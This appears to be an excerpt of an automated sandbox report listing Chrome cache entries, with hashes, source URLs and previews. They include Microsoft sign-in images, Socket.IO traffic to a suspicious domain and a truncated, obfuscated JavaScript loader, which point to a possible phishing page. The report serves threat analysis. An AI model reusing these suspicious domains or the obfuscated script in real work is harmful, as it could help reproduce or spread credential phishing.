Preview:	./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes /.html{box-sizing:border-box},:before,:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p

Chrome Cache Entry: 75

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (49854)
Category:	dropped
Size (bytes):	49993
Entropy (8bit):	5.216475744251136
Encrypted:	false
SSDEEP:
MD5:	777EB8FD4F8320B6E5CC9A7159BDEC6A
SHA1:	6B4032E88D0040182089FE3BEFDECEE9346E8921
SHA-256:	73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
SHA-512:	D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
Malicious:	false
Reputation:	unknown
Preview:	/!. Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e\|\|self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable\|\|!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e\|\|null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t\|\|"default");if("object"!=typeof r)return r;th

Chrome Cache Entry: 78

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
Category:	downloaded
Size (bytes):	199
Entropy (8bit):	6.766983163126765
Encrypted:	false
SSDEEP:
MD5:	21B761F2B1FD37F587D7222023B09276
SHA1:	F7A416C8907424F9A9644753E3A93D4D63AE640E
SHA-256:	72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
SHA-512:	77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
Malicious:	false
Reputation:	unknown
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg
Preview:	..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....

Chrome Cache Entry: 79

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	52
Entropy (8bit):	4.190260390968384
Encrypted:	false
SSDEEP:
MD5:	09BDE5D10D92DEBBB74AE9C3DF3AECAB
SHA1:	2F4EEA05E85C26DE82C5E7CBA471687EC8D855EC
SHA-256:	F67F67274C88240DE01FA51D483271F58A5752B607B13DEE041C7A0671290E7F
SHA-512:	0FF4A460BC9068E61B6EEC0078E97F2AD0DCD12288E8161688351C3BB85A87D624E5B7635C47ED1B5B93C6D3B4A29A756A75A897394B4E6A3986BBB1762CFC6C
Malicious:	false
Reputation:	unknown
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISJQmpjAyCgpZH5BIFDZFhlU4SBQ01hlQcEgUNkWGVThIFDZFhlU4=?alt=proto
Preview:	CiQKBw2RYZVOGgAKBw01hlQcGgAKBw2RYZVOGgAKBw2RYZVOGgA=

Chrome Cache Entry: 80

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1636
Entropy (8bit):	4.214613323368661
Encrypted:	false
SSDEEP:
MD5:	F7AB697E65B83CE9870A4736085DEEEC
SHA1:	5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
SHA-256:	CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
SHA-512:	158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
Malicious:	false
Reputation:	unknown
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21

Chrome Cache Entry: 81

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	downloaded
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
Reputation:	unknown
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Chrome Cache Entry: 82

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	41
Entropy (8bit):	4.180365114215879
Encrypted:	false
SSDEEP:
MD5:	64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
SHA1:	69E40D8C48A866A84046FD8BD17AF47FF02B79A4
SHA-256:	8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
SHA-512:	F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
Malicious:	false
Reputation:	unknown
URL:	https://grastoonm3vides.com/socket.io/?EIO=4&transport=polling&t=PCX6VYX&sid=NjGVkbKBdPMtGKXHAAVL
Preview:	{"code":1,"message":"Session ID unknown"}

Chrome Cache Entry: 84

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (2044)
Category:	downloaded
Size (bytes):	4233
Entropy (8bit):	5.182129754777606
Encrypted:	false
SSDEEP:
MD5:	69C55CC5AE8BBC3F62CC424F2C0C53BA
SHA1:	5E2AE4BD6E54E928C9EE38A8F41DB0C9F8306C04
SHA-256:	F3774B1C9DC02AF59F466C11C9B0AE85AA0737679854CB64519B0DBBBA809FE3
SHA-512:	A3348E5AF70B5E75EA4E60B3813426F33E99FB8540271E39D2E08B85B63903E3190F4C24E9AA55F21B5B03CE6ADCA5CC3A7945011F6602694EF32F1C82B38FD3
Malicious:	false
Reputation:	unknown
URL:	https://373939.multitudeofdreams.com/favicon.ico
Preview:	<html>. <head>. <title>COMING SOON</title>. <body>. <div class="bgimg">. <div class="middle">. <h1>COMING SOON</h1>. <hr>. <p id="demo" style="font-size:30px"></p>. </div>. </div>. <style>. body,. html {. height: 100%;. margin: 0;. }.. .bgimg {. background-image: url("https://i.imgur.com/xA8aaXN.png");. height: 100%;. background-position: center;. background-size: cover;. position: relative;. color: white;. font-family: "Courier New", Courier, monospace;. font-size: 25px;. }.. .topleft {. position: absolute;. top: 0;. left: 16px;. }.. .bottomleft {. position: absolute;. bottom: 0;. left: 16px;. }.. .middle {. position: absolute;. top: 80%;. left: 50%;. transform: translate(-50%, -50%);. text-align: center;. }.. hr {. margin: auto;.

Chrome Cache Entry: 88

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (64593)
Category:	dropped
Size (bytes):	100217
Entropy (8bit):	4.516887791126109
Encrypted:	false
SSDEEP:
MD5:	57B032180AFEBEB7A6C31D0A7F35C47A
SHA1:	E6C8EE94D3A447EF0B81A1F406AA7F2907CBC798
SHA-256:	DB290E0F0161B9962787FA22C846F5D53BEBCD5B46B77837AF5048C09981A7BB
SHA-512:	0A059C64899F0A20FE9EDF7A94E9F0FE76775B7DED8703140CF5D309D87643575E1F98C4020862270A44D679170CDD9B061B7C924CAE7D7B7B5DFE3F66A6F269
Malicious:	false
Reputation:	unknown
Preview:	function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3ed08f, _0x56c8b3) {. const _0x2019c0 = _0x1fae,. _0x43cc63 = _0x3ed08f();. while (!![]) {. try {. const _0x262285 = parseInt(_0x2019c0(0x121)) / 0x1 + -parseInt(_0x2019c0(0x170)) / 0x2 + -parseInt(_0x2019c0(0x14b)) / 0x3 + -parseInt(_0x2019c0(0x14d)) / 0x4 + -parseInt(_0x2019c0(0x14c)) / 0x5 + -parseInt(_0x2019c0(0x118)) / 0x6 + parseInt(_0x2019c0(0x171)) / 0x7;. if (_0x262285 === _0x56c8b3) break;. else _0x43cc63['push'](_0x43cc63['shift']());. } catch (_0x3070ea) { _0x43cc63['push'](_0x43cc63['shift']()); }. }.}(_0x59eb, 0x27508), window['addEventListener']('load', function() {. const _0x1706f4 = _0x1fae;. document[_0x1706f4(0x166)][_0x1706f4(0x102)](_0x1706f4(0x151

Chrome Cache Entry: 90

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	2228
Entropy (8bit):	7.82817506159911
Encrypted:	false
SSDEEP:
MD5:	EF9941290C50CD3866E2BA6B793F010D
SHA1:	4736508C795667DCEA21F8D864233031223B7832
SHA-256:	1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
SHA-512:	A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
Malicious:	false
Reputation:	unknown
URL:	https://www.gstatic.com/recaptcha/api2/logo_48.png
Preview:	.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6....Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6.....,xz.._......B."#...L(n..f..Yb....8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o..........x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.....-.A.}.......I .P.....S....\|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.\|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4\|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.

Static File Info

⊘No static file info